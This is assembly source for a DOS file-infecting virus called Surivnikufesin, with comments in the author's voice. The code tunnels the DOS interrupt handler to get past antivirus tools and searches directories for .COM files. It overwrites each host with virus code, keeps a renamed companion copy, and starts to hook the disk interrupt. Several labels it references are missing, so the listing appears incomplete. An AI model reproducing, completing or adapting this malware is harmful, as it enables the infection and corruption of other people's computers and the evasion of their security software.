; [NFV] Surivnikufesin
.model tiny
.radix 16
code_size = (ptbl-virus)
werd = word
dwerd = dword
virus: mov ax, 0d38c ; I really thought TBCLEAN was the
adc ax, 7533 ; be-all, end-all, whip-the-pants-
jb $-5 ; off-of-McAfee, AV program...this
aam 0ff ; trick has worked for over a year
mov al, ah
cld ; forward moves
mov ah, 1a
mov dx, (bootsec-virus+100)
int 21 ; set new dta
mov ah, 4a
mov bx, 1000+(end_virus-virus)
int 21 ; resize .com memory block
jc restore_host ; if not enough memory then exit
mov ax, cs ; get code segment
add ah, 10 ; bump up 64k
mov es, ax ; new virus segment
mov si, 100 ; code to copy
sub di, di ; place to copy to
mov cx, (ptbl-virus+1)/2 ; size of virus
repz movsw ; zopy virus
mov ax, offset high_code
push es ax ; set a retf frame
retf ; jump to other copy of virus
push cs cs ; restore segments
pop ds es
mov ah, 4a
mov bx, -1
int 21 ; get available memory blocks
;fix up bx
mov ah, 4a
int 21 ; restore block to maximim memory
mov ah, 1a
mov dx, 80
int 21 ; restore old new dta
mov si, cx ; reset si, di
mov di, cx
mov ah, 34
int 21 ; get indos flag
mov dx, es ; save dos segment
mov ah, 52
int 21 ; get dos variables address
mov ax, es ; save dos segment
mov werd ptr cs:[dosvars], bx ; save dos variables list
mov werd ptr cs:[dosvars+2], ax
mov ax, dx ; compare segments to be sure
jne restore_host
neg ax
add ax, es:[bx-2] ; get size of dos segment
xchg bx, ax
mov ah, 48 ; allocate memory the size of the
int 21 ; dos block
jc restore_host ; if not enough then exit
mov ds, dx ; dos segment
mov es, ax ; allocated memory
mov cl, 3
shl bx, cl ; convert to werds
mov cx, bx
repz movsw ; zopy dos segment to allocated
; memory
mov cs:[tempseg], es ; save allocated segment
push ds
pop es ; dos segment
mov ds, cx ; ivt
mov di, cx ; es:di -> pointer to dos segment
mov cx, bx ; size of dos segment in werds
mov ax, 0cccc
cli ; don't allow ints to call dos
repz stosw ; fill dos segment with int 3
mov cs:[segsize], bx ; save dos segment size
mov cs:[dos_seg], es ; save dos segment
les bx, dwerd ptr ds:[3*4] ; get int 3 address
mov werd ptr cs:[save3], bx ; save int 3 address
mov werd ptr cs:[save3+2], es
mov werd ptr ds:[3*4], offset int3 ; set new int 3
mov ds:[3*4+2], cs
mov ah, 52 ; only dos should trap this call
int 21 ; tunnel dos
error: ; should never reach here
int3: pop ax bx ; get dos handler address
mov werd ptr cs:[org21+2], bx ; save dos segment
dec ax ; adjust offset for int 3
mov werd ptr cs:[org21], ax ; save dos offset
mov sp, 0fffc ; fix sp
push cs
pop ds
sub si, si
mov di, si
mov es, ds:[dos_seg] ; es:di -> pointer to dos segment
mov cx, ds:[segsize] ; size of dos segment in werds
mov ds, ds:[tempseg] ; ds:si -> pointer to dos code
repz movsw ; restore dos segment
sti ; allow ints again
push ds ; save allocated segment
mov ds, cx ; ivt
les bp, dwerd ptr ds:[24*4] ; get int 24 address
mov werd ptr cs:[save24], bp ; save int 24
mov werd ptr cs:[save24+2], es
mov ds:[3*4], ax ; set new int 3
mov ds:[3*4+2], bx
pop es
mov ah, 49
int 3 ; deallocate segment
mov werd ptr ds:[24*4], offset int24 ; set new int 24
mov ds:[24*4+2], cs
push ds ; save ivt
push cs cs
pop ds es
mov ah, 1a
mov dx, offset newdta
int 3 ; set new dta
mov ah, 4e
mov cx, 3 ; hidden, read-only
mov dx, offset filename
test ax, 0
org $-2
mov ah, 4f
int 3 ; find file
jnc infect ; if no error then infect
mov ah, 3bh
mov dx, offset dirspec
int 3 ; transverse directory upward
jnc find_first
les bx, dwerd ptr ds:[save24] ; get int 24 address
pop ds ; get ivt
mov ds:[24*4], bx ; restore int 24
mov ds:[24*4+2], es
les bx, dwerd ptr cs:[save3] ; get int 3 address
mov ds:[3*4], bx ; restore int 3
mov ds:[3*4+2], es
jmp restore_host
infect: mov ax, 'OC'
cmp ax, werd ptr ds:[newdta+1e] ; check for command.com
je find_next
xor ax, werd ptr ds:[newdta+26] ; see if .com file
or ax, werd ptr ds:[newdta+1a] ; and under 64k
jnz find_next
xchg cx, ax
mov ax, 4301
mov si, cx
mov dx, offset dta+1e
push ax dx
int 3 ; clear attributes
mov ax, 3d02
int 3 ; open file
xchg bx, ax
mov ah, 3f
mov cx, code_size ; size to read
mov dx, offset buffer ; place to read to
mov di, dx ; for compare
int 3 ; read in host
mov cx, (save13-virus) ; size to compare
repz cmpsb ; check for infection
pop si
je close
mov ax, 4200
int 3 ; seek to beginning of file
mov di, offset host
mov cl, 4
push di
repz movsw
mov ah, 40
mov cx, code_size
int 3 ; overwrite code
mov ax, 4400
int 3 ; get file data
or dl, 40 ; don't set file time/date
inc ax
int 3 ; set file data
pop dx
push bx cx ; save handle
mov ah, 3c
sub cx, cx ; no attribs
int 3 ; create companion
xchg bx, ax
mov ah, 40
pop cx
mov dx, offset buffer
int 3 ; write companion
mov ah, 3e
int 3 ; close companion
pop bx ; restore handle
close: mov ah, 3e
int 3 ; close host
pop ax
mov cl, byte ptr ds:[dta+15]
sub ch, ch
int 3 ; restore attribs
jmp find_next
int24: mov al, 3
sub di, di
mov sp, 7c00 ; set up a new stack
mov ss, di
push cs
pop ds
mov si, sp
les bx, dwerd ptr ds:[13*4] ; get int 13 vector
; mov werd ptr ds:[si+(save13-boot_sec)], bx ; save i13 vector
; mov werd ptr ds:[si+(save13+2-boot_sec)], es
filename db '*.??m', 0
dirspec db '..', 0
host db 8 dup (0), '.NFV', 0
save3 dd ?
save24 dd ?
org21 dd ?
dos_seg dw ?
segsize dw ?
tempseg dw ?
dosvars dd ?